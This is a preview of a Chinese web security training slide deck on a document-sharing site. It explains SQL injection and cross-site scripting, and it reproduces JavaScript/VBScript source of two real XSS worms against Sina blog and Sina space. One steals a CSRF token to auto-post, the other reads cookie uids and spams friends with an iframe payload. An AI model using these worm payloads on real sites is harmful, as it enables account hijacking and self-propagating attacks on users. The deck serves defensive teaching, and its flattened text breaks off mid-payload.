WEB安全培训PPT.pptVIP

  1. 1、本文档共86页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
WEB安全培训PPT

内容简介 1. 知己知彼,百战不殆 2. 解析黑客手中的利器 3. 捍卫代码城堡 4. 剑走偏锋 5. 惊栗后的深思 6. 双剑合壁; ;脚本安全编程重要性; ;WEB攻击流程;黑客攻击技术曝光; SQL注入利用的是参数传递的时候过滤不严时用参数组合成正确的SQL语句来执行操作的技术。 简单的理解为:涉及进入SQL语句操作的变量没有过滤输入与转义输出 实例-夜猫软件下载系统(攻击与修复) 8/ymdown/show.php?id=1;黑客攻击技术曝光; XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码(恶意JS代码),当用户浏览该页之时,嵌入其中Web里面的html代码(恶意JS代码)会被执行,从而达到恶意用户的特殊目的。 输入一些数据需要在页面中显示出来,但是没有对这段数据做过滤输入或者转义输出。;xss特点 继承浏览器权限 社会工程,被动攻击 影响广泛(只要浏览器支持JavaScript) 隐蔽,难以察觉 XSS可能出现在哪? 1. HTML标签外部 2. HTML标签内部(属性、事件) 3. 输入到javascript代码 ; ;百度XSS蠕虫攻击统计 ;新浪博客 v5.0 蠕虫 var blogtitle = I OwNed youR BloG var blogbody = You\rE mY fOOd.bra href=\\蠕虫传播主体,不要构造这里/a var xmlhttp = new ActiveXObject(Msxml2.XMLHTTP.3.0); xmlhttp.open(GET,/admin/article/article_add.php,false); xmlhttp.send(); var xss = xmlhttp.responseText; token=xss.indexOf(vtoken); if(token0) { vtoken=xss.substr(token+15,32); xmlhttp.open(post,/admin/article/article_post.php,false); xmlhttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded); xmlhttp.send(album=blog_id=is_album=0stag=sno=channel_id=url=channel=newsid=book_worksid=vtoken=+vtoken+is_media=0blog_title=+blogtitle+blog_body=+blogbody+tag=blog_class=0x_cms_flag=1sina_sort_id=117is2bbs=1join_circle=1); var suss = xmlhttp.responseText; send=suss.indexOf(06001); if(send0) { //alert(感染成功 : )); document.location = /; } else { alert(感染失败 : (); } };新浪空间 好友纸条群发蠕虫 获取cookie中的uid cookie=unescape(request(cookie)) cflag=Instr(cookie,nick=) dflag=Instr(cookie,);) …………………省略…………………….. 遍历好友数 for i = 1 to 500 得到此uid的好友 url=/friend/list.php?uid= uid page= i pagesize=1 xml.open GET,url,False xml.send htmlcon=b2bstr(xml.responsebody) 提取好友uid aflag=Instr(htmlcon,{record:[{uid:) bflag=InStr(htmlcon,,ftype) If aflag 0 And bflag 0 Then okflag=Replace(Replace(mid(htmlcon,aflag,bflag),{record:[{uid:,),,) Else 超过最大好友数就中断 exit for End If playload Response.Write iframe src=message.asp?uid= okflag width=700 height=30“ fra

文档评论(0)

djdjix + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档